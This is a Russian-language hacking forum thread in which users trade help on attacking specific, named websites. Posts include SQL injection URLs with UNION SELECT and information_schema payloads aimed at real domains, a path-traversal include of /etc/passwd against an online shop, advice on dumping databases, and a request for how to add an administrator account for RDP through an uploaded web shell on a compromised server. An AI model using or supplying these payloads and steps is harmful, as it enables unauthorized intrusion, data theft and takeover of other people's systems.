Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,550
    Likes Received:
    1,252
    Reputations:
    274
    попробуй как слепую крути, вариантов много что там фильтруется...
     
  2. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,550
    Likes Received:
    1,252
    Reputations:
    274
    скорее всего фильтрация по айпи... так что не судьба..если конечно админ сайта не твой друг...
     
  3. hacker-nubik

    hacker-nubik New Member

    Joined:
    20 Apr 2010
    Messages:
    9
    Likes Received:
    2
    Reputations:
    0
    Есть обычная blind sql inj, фильтруется LIMIT? Как можно раскрутить без LIMIT'a?
     
  4. DrakonHaSh

    DrakonHaSh Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    118
    Likes Received:
    29
    Reputations:
    24
    hacker-nubik
    http://raz0r.name/obzory/group_concat/
    и особенно, ближе к самому концу, коммент от iHornet

    еще сюда: https://rdot.org/forum/showthread.php?t=60 глянь

    а как это к слепой прикрутить включай мозг ;)
     
  5. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    помогите заинклудить
    http://luvaccessories.com/shopping.php?category_name=Romantic_Gifts&page=../../../../etc/pssswd%00
     
  6. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    как слить базу данных мускул? есть доступ к фтп.
     
  7. Axel_Ustus

    Axel_Ustus New Member

    Joined:
    4 Jun 2010
    Messages:
    17
    Likes Received:
    4
    Reputations:
    1
    http://www.skunk2.com/news2.php?news_id=43+union+select+1,2--
    выдает ошибку хотя количество полей подобрано верно
    обьясните почему и как выкрутиться
     
  8. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    я пробовал неполучилось:(
    пишет error can't open file
    а теперь в предачу еще пишет
    You were denied access because:

    Access denied by access control list.
    но это изза прокси...

    может посоветуете какойнибудь провереный дампер
     
    #14828 547, 19 Sep 2010
    Last edited: 19 Sep 2010
  9. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,550
    Likes Received:
    1,252
    Reputations:
    274
    BLIND
     
  10. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    как узнать список таблиц из определенной бд?
    я пробовал чтото вроде этого
    http://www.ччч.ru/news.php?id=-45+union+select+1,2,3,4,5,unhex%28hex%28group_concat%28table_name%29%29%29,7,8,9,10+from+information_schema.schemata+where+schema_name=0x00000000
    невыйшло..
     
  11. Blizzard

    Blizzard Member

    Joined:
    27 Jul 2010
    Messages:
    16
    Likes Received:
    16
    Reputations:
    0
    from+information_schema.tables+where+table_schema=0x000
     
  12. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    728
    Reputations:
    948
    547
    1) кавычки хексить/чарить не надо;
    2) если бока, то тащи с INFORMATION_SCHEMA.COLUMNS->TABLE_NAME
    или Mysql->columns_priv-> Table_name если возможно.
     
  13. Darth Padla

    Darth Padla Member

    Joined:
    21 Jun 2010
    Messages:
    141
    Likes Received:
    25
    Reputations:
    8
    SELECT title FROM leader_page_titles WHERE '/news.php?newsid=тут иньекция' LIKE CONCAT('%',url,'%')
    как раскрутить?
     
  14. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,550
    Likes Received:
    1,252
    Reputations:
    274
    эфект тот же....
     
  15. roddik

    roddik Member

    Joined:
    14 Jan 2009
    Messages:
    117
    Likes Received:
    13
    Reputations:
    0
    если с
    /display.php?selected=322' выдается ошибка Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in ..., но 323-1, любые комментарии, в т.ч. /**/ выдают ошибку, selected=(select 322) тоже, о чем это может говорить? смущает то, что если бы софтина была написана правильно, ошибки бы не было, но не могу понять, какое фильтрование используется...
     
  16. kfor

    kfor Elder - Старейшина

    Joined:
    1 Sep 2005
    Messages:
    278
    Likes Received:
    48
    Reputations:
    29
    Так сложно сказать.. кидай в личку сылку если хочешь.. надо смотреть..
     
  17. Darth Padla

    Darth Padla Member

    Joined:
    21 Jun 2010
    Messages:
    141
    Likes Received:
    25
    Reputations:
    8
    Это всё уже попробовал,не катит. Пишет
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and+union+select+1/*' LIKE CONCAT('%',url,'%')' at line 1
     
  18. kfor

    kfor Elder - Старейшина

    Joined:
    1 Sep 2005
    Messages:
    278
    Likes Received:
    48
    Reputations:
    29
    ну могу тебе сказать тока как и предыдущему человеку кидай сыль в личку... ему ответ кинул надеюсь поможет ... если смогу и тебе помогу..
     
  19. Darth Padla

    Darth Padla Member

    Joined:
    21 Jun 2010
    Messages:
    141
    Likes Received:
    25
    Reputations:
    8
    А почему в личку?мне не жалко,просто из принципа раскрутить хочется.

    view-source:http://znakomye.ru/news.php?дальше скуля
     
  20. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    459
    Likes Received:
    62
    Reputations:
    26
    Народ, такой вопрос.
    Вообщем залил шел wso2 на win2k3 имею полный доступ ко всему что находится на винте.
    Как через шелл создать юзера и добавить его в группу админов что бы я мог зайти на RDP ?
     
Loading...
Thread Status:
Not open for further replies.